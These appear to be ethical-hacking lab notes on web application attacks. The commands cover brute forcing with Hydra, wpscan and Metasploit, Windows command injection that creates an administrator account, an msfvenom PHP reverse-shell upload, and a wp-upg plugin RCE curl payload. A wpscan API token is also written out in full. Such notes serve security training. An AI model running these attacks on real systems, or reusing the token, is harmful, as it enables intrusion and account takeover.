2. Perform Web applications Attacks
An ethical hacker or pen tester must test their company’s web application against various attacks and other vulnerabilities.
1. Brute force using Burp
set the burp proxy in browser, intercept the request, right click it and send it to intruder.
Now clear the fields and set the targets
sniper if you are only brute forcing password.
cluster if bruteforcing both username and password
set the payload, wordlists and launch attack. Different values of length will indicate the successful attempt.
Other Bruteforcing tools
medusa -h 10.10.10.x -U /root/Documents/user_list.txt -p /root/Documents/pass_list.txt -M ftp -F
Hydra Brute force cheatsheat
# SSH
hydra -l username -P passlist.txt 192.168.0.100 ssh
# FTP
hydra -L userlist.txt -P passlist.txt ftp://192.168.0.100
# If the service isn't running on the default port, use -s
hydra -L userlist.txt -P passlist.txt ftp://192.168.0.100 -s 221
# TELNET
hydra -l admin -P passlist.txt -o test.txt 192.168.0.7 telnet
# Login form
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"
2. Parameter tampering using Burp
In the proxy tab, go to the inspector session where value and name will be visible. You can change it and see the response.

3. Identify XSS using PwnXss
python3 pwnxss.py -u http://testphp.vulnweb.com

4. Exploit Parameter tempering with XSS
5. Perform CSRF attacks
WPSCAN
wpscan --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY --url https://www.cavementech.com/ --plugins-detection aggressive --enumerate vp
Add --random-user-agent to avoid firewalls
6. Hack a wordpress site with WPSCAN and Metasploit
Installation
sudo apt update && sudo apt install wpscan
wpscan --update
Enumerate wordpress users
wpscan --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY --url https://cavementech.com/ --enumerate u
WPSCAN can be used to enumerate users, themes, plugins etc
wpscan --url http://cmnatics.playground/ --enumerate u,p,t,vp --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY

Now launch the Metasploit with database
service postgresql start
msconsole
use auxillary/scanner/wordpress_login_enum
Now set the options to brute force it
set PASS_FILE /usr/worlist.txt
set RHOSS 192.168.52.2
set RPORT 8080
set TARGETURI http://dddddd/login
set USERNAME admin
run

WPSCAN brute forcing
wpscan –-url http://cmnatics.playground –-passwords rockyou.txt –-usernames cmnatic --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY
Reference
7. Remote command execution to compromise a target server
Setup and complete DVWA Guides
Windows Command Injection
hostname
whoami
tasklist
Taskkill /PID 3112 /F //forcefully kills the processes
dir c:\
net user
net user test /add //add a new user
net localgroup Administrators test /add //add test user to administrators
net user test //to view the details of the user
dir c:\ "pin.txt" or this command ! Take pin.txt
| type c:\"pin.txt"
8. Exploit File upload vulnerability
Generating the payload
msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw >exploit.php
Run multi/handler to catch the shell
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
Check the above DVWA walkthroughs. For high mode add the following on top of payload and save it as jpeg
GIF98a;
Now in command prompt, rename the file
copy C:\wamp64\www\DVWA\hackable\uploads\shell.jpeg C:\wamp64\www\DVWA\hackable\uploads\shell.php
open the shell, and you will get the meterpreter session.
9. Exploit Log4j vulnerability
10. Perform Remote Code Execution (RCE) Attack
We will exploit RCE in a plugin in wordpress.
In the Terminal window, run wpscan --url http://10.10.1.22:8080/CEH --api-token [API Token] command.
The result appears, displaying detailed information regarding the target website.
Scroll down to the Plugin(s) Identified section, and observe the installed vulnerable plugins (wp-upg) on the target website.
In the Plugin(s) Identified section, within the context of the wp-upg plugin, an Unauthenticated Remote Code Execution (RCE) vulnerability has been detected as shown in the screenshot.
The number of vulnerable plugins might differ when you perform this lab.
In this task, we will exploit the RCE vulnerability present in the wp-upg plugin.
To perform RCE attack, run curl -i 'http://10.10.1.22:8080/CEH/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:whoami:NULL:NULL' command.
This curl command exploits a WordPress plugin vulnerability by sending a malicious request to the admin-ajax.php file, allowing an attacker to execute arbitrary system commands via the exec function, potentially leading to remote code execution.
In the last step, whoami command was executed, yielding the outcome nt authority\ \system
Last updated
Was this helpful?